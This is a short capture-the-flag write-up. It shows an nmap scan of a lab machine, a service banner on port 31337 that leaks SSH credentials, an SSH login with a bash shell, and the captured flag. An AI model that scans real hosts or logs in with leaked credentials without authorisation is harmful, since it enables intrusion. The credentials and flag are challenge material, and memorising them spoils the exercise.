└─$ sudo nmap -Pn -p- -sT -oN all_ports.txt 10.10.176.62 

PORT      STATE SERVICE
22/tcp    open  ssh
2222/tcp  open  EtherNetIP-1
31337/tcp open  Elite

PORT      STATE SERVICE VERSION                         
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)                                
| ssh-hostkey:                                                                                                      
|   3072 7d:dc:eb:90:e4:af:33:d9:9f:0b:21:9a:fc:d5:77:f2 (RSA)                                                      
|   256 83:a7:4a:61:ef:93:a3:57:1a:57:38:5c:48:2a:eb:16 (ECDSA)                                                     
|_  256 30:bf:ef:94:08:86:07:00:f7:fc:df:e8:ed:fe:07:af (ED25519)                                                   
2222/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)                                
| ssh-hostkey:                                                                                                      
|   3072 84:5c:ee:d3:12:bd:84:52:bb:e0:96:d7:2a:f2:8e:69 (RSA)                                                      
|   256 b3:94:5a:ad:e2:8d:d0:52:50:75:fd:53:18:9b:b3:ec (ECDSA)                                                     
|_  256 6a:a0:5b:7f:c5:3c:c8:02:38:12:ec:4f:f4:67:2e:64 (ED25519)
31337/tcp open  Elite?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSess
ionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: 
|     In case I forget - user:pass
|_    ubuntu:Dafdas!!/str0ng

We receive the credentials to ssh.
Using the /bin/bash we get a more interactive shell

The flag is in the /home/user directory: flag{251f309497a18888dde5222761ea88e4}
